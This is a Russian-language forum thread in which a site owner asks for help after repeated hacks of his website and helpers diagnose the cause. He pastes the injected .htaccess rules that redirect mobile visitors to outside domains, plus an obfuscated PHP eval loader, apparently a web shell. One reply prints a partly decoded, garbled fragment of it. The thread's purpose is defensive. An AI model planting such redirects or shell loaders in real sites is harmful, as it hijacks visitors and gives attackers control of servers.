0 / 0 / 0
Регистрация: 02.11.2012
Сообщений: 11
1

Взламывают сайт

01.12.2012, 01:30. Показов 2630. Ответов 11
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Здравствуйте.
Недавно зашёл на свой сайт и обнаружил, что вместо содержимого отображается пустой экран. Исходный код всех страниц вычищен под нуль. Однако админка сайта функционирует, бд и фтп вроде не тронуты. Нашёл только в файле .htaccess какой то левый кусок кода, который я не помещал в него:
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
php_value error_reporting "E_ALL ^ E_WARNING ^ E_NOTICE"
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]
Удалил его, однако проблема не исчезла, контента как не было так и нет.
Нашёл в кэш файлах админки левый файл rus_dlg.php, который был создан именно в тот момент когда меня в сети не было несколько дней. Файл левый потому что: 1) раньше его не было. 2) в под домене лежит точная, функционирующая копия основного сайта, так сказать для теста различных плюшек, так в ней такого файла нет. Привёл часть кода из файла, т.к. в теле слишком много набора букв. Сам файл также прикрепил.
PHP
1
2
3
<?php
eval("\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050\163\164\162\162\145\166\050'==wOpUGZvN0Yp1WYulHRpdGJowWY2VGQgkSKlR2bDNWatFmb5RUanRCK5RHctVWIoAiZpByOpgSZk92Q0V2RpdGI9ASZk92QjlWbh5WeEl2ZkASfg0HI7kSRNFkTfxUSUV1XMJVVD9VSHhCajlGaXBHaQl2Zg4mc1RXZyByegkCKgUGbiFGbpFmdBNXag42bpR3YuVnZg0HI7kCKjVGel9lPtMXaoRHJg4mc1RXZyByOpwmc1RCKsJXVkRWYf5TLzlGa0RCI7kSKhRXYkRCK5JXZ1FFZslWdCBHd0hmPtMXaoRHJgwyJhRXYk1SLngSbhJXYQ***НАБОР_СИМВОЛОВ_В_ТОМ_ЖЕ_ДУХЕ(СОКРАТИЛ)***WbpR3Xu9Wa0V3YlhXZfhXYtdCK0V2cflmbpBEI7kCMoQXatlGbfVWbpR3X0V2cAByOpADKn5Wa0J3bwVmcfJ3byJXZAByOpkyXfVETJZ0XfBCLncCIscyLq4CbhZXZqMHX6wlKzxVKctCZchCXvcCKlNWYsBXZy91ZlJHcgwyJf9VRMlkRfNVSIR1XJd0XfdCKl5WamVGZ'\051\051\051\073");
?>
К моему счастью хостер делает полные бекапы данных, так что вскоре восстановили сайт. Через 2 дня взлом повторился, таже картина. Буду очень благодарен, если кто то сможет растолковать что делают эти куски кода, как злоумышленникам удалось взломать сайт и что предпринять, что бы подобное не повторилось вновь.

**UPD снова левая часть кода в .htacces уже после второго взлома. Также нашёл новый левый файл, идентичный rus_dlg.php, только называется table_insert.php.
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]
php_value error_reporting "E_ALL ^ E_WARNING ^ E_NOTICE"
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
 
RewriteRule ^(.*)$ http://mobi-go.in/l=32411e12056c0b4d035645564954534375501e0604741500071b000216460b527549051b057e4c594a580c01 [L,R=302]
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
01.12.2012, 01:30
Ответы с готовыми решениями:

Как проверить сайт на нагрузку? Через какой сервис? (Сколько человек выдержит мой сайт)
Добрый вечер. Через какой сайт можно проверить? Сразу напишу по счет Ddos атаки хз даже, там я...

Постоянно взламывают почту
Добрый вечер. Проблема в следующем. Постоянно вскрывают почту, несколько раз меняла пароли, ничего...

С какой целью взламывают сайты
С какой целью хакерам нужно взламывать сайт Министерства обороны. Я просто не понимаю, зачем им...

взламывают пароли в соц. сетях
Несколько дней назад оформляла пополнение вебмани кошелька и перешла на сайт, который не вызвал...

11
637 / 415 / 27
Регистрация: 03.11.2009
Сообщений: 1,855
01.12.2012, 01:56 2
php код вроде зашифрованный шелл
в .htacces вроде перенаправление
ищите ошибки в коде похоже у вас где то xss или sql инъекция
1
0 / 0 / 0
Регистрация: 02.11.2012
Сообщений: 11
01.12.2012, 02:19  [ТС] 3
t1m0n
Вы не могли бы пояснить что выполняют эти шеллы?
И что вы имеете ввиду под ошибками в коде, что именно искать?
0
637 / 415 / 27
Регистрация: 03.11.2009
Сообщений: 1,855
01.12.2012, 02:38 4
шелл это грубо говоря урезаная админка с помощью нее можно добавлять файлы, изменять, редактировать базу
кстати проверьте вашу базу может там появились другие пользователи с правами администратора
ошибки в коде, допустим, где заливка файлов, пользователь может залить пхп файл или другой файл и выполнить
из каких то форм данные не фильтруются для запросов к базе данных
лучше наймите специалиста дыра на сайте осталась скорее всего и каждый раз когда вы будете восстанавливать из бекапа все равно будут ломать
2
Почетный модератор
Эксперт HTML/CSSЭксперт PHP
16844 / 6723 / 880
Регистрация: 12.06.2012
Сообщений: 19,967
01.12.2012, 10:29 5
это то, что в Php-коде (с кодировкой лень возиться)
PHP
1
2
3
4
define('__GI_THIS_FILE__', preg_replace('/\(\d+\)\s*\:\s*eval.*/', '', __FILE__)); @error_reporting(0); @set_time_limit(0); @ini_set('max_execution_timd\蛊   ˋY]Iˈ   \ˏꝝ횛]Y\]JJNȉ\ˏ瘙\늉\늎Ȝ靝\눉\ˏ癞XʊNȟH훘ݚ[ۈ\Н蚛X뙈
 
HȜ靝\눙ڔښXڊҗЕT㗕USӐSQJNȟHH   ڑ[蛚XЛٙHHڑٝۙJ
NȚY芈Y[\J   ڑ[蛚XЛٙJJH]蛊  ڑ[蛚XЛٙJNĀ
2
0 / 0 / 0
Регистрация: 02.11.2012
Сообщений: 11
01.12.2012, 11:20  [ТС] 6
я понял что эта часть кода ищет разделители, слеши и удаляет их, так? зачем, что это даёт?
0
6 / 6 / 1
Регистрация: 25.07.2011
Сообщений: 68
20.12.2012, 15:42 7
Ты не понял
Функция дешифрует зашифрованный текст, и исполняет его
Это сделано для того чтоб сжать и скрыть от посторонних глаз эту программу.

Я бы на твоем месте либо прогрепал весь контент на наличие текста, либо посмотрел даты изменения своих файлов.

Кстати в целях секьюрности, не лишним будет написать скриптец, который сканирует твои файлы на изменения, и кукарекает тебе на почту, если что-то изменилось
1
0 / 0 / 0
Регистрация: 02.11.2012
Сообщений: 11
20.12.2012, 23:52  [ТС] 8
ntfs1984
Спасибо. Теперь понятно.
С проблемой уже вроде как разобрались, да и текст также находил. Оказалось что хакер ломал ssh и через него уже творил всякие чудеса. Ssh закрывали, перепароливали, но он как то снова открывал его. После пары махинаций с доступами и паролями, уже как продолжительное время всё в порядке. А взламывали сайт через аккаунт моего коллеги.
За идею - спасибо, можно будет сварганить на досуге.
0
6 / 6 / 1
Регистрация: 25.07.2011
Сообщений: 68
21.12.2012, 00:17 9
Да кстати про ssh.
Особо упоротые параноики советуют перевешивать его на другой порт, а лично я на своем сервере настроил прием подключений только с одного хоста, промежуточного, а уже туда подключаюсь с любого другого места.

В любом случае очень важно (если конечно инфа важная) сделать адекватную систему мониторинга и алертов, которая следит за подключениями, серверами, файлами, и так далее.
1
0 / 0 / 0
Регистрация: 02.11.2012
Сообщений: 11
21.12.2012, 00:52  [ТС] 10
Спасибо за совет, надо будет озадачиться вопросом реализации на этих выходных.
0
6 / 6 / 1
Регистрация: 25.07.2011
Сообщений: 68
31.12.2012, 01:38 11
Кстати нашел сцылко по теме:

http://userglobus.com/cm50_thread_50e0b3aa566c0
Там описан скрипт для этих действий.
1
27 / 24 / 2
Регистрация: 25.12.2012
Сообщений: 127
31.12.2012, 11:39 12
То что в eval это закодированный PHP код. Если интересно что в нём - декодером можно раскодировать и посмотреть.

Скорее всего вам залили шел. Для его поиска ищите файлы которые появились не давно. + можно воспользоваться скриптом для поиска шелов - http://revisium.com/ai/

Но удаление шелла проблемы не решит. Ищите уязвимость. Скорее всего она в каком-то из плагинов.
1
31.12.2012, 11:39
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
31.12.2012, 11:39
Помогаю со студенческими работами здесь

При попытка зайти на любой сайт антишпионом перехватывается сайт partner-pop.men. Как убрать этот сайт?
При попытка зайти на любой сайт через Гугл Хром антишпионом Антимальварэ-байтс перехватывается сайт...

Сайт после 5 секунд заходит на другой сайт (взломали сайт)
Когда я открою свое сайт он после 5 секунд заходит на другой сайт (взломали сайт) там написано что...

При заходе в интернет и клике на любой сайт перекидывает редиректом на др.сайт
Нужна помощь. Подскажите плиз что делать. Где искать вредоносный файл и как удалить. При заходе в...

При запуске google открывается сайт nftds2.ru и перенаправляет на сайт с рекламой
При запуске google открывается сайт nftds2.ru, потом перенаправляет на nftds.ru, после он...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
12
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru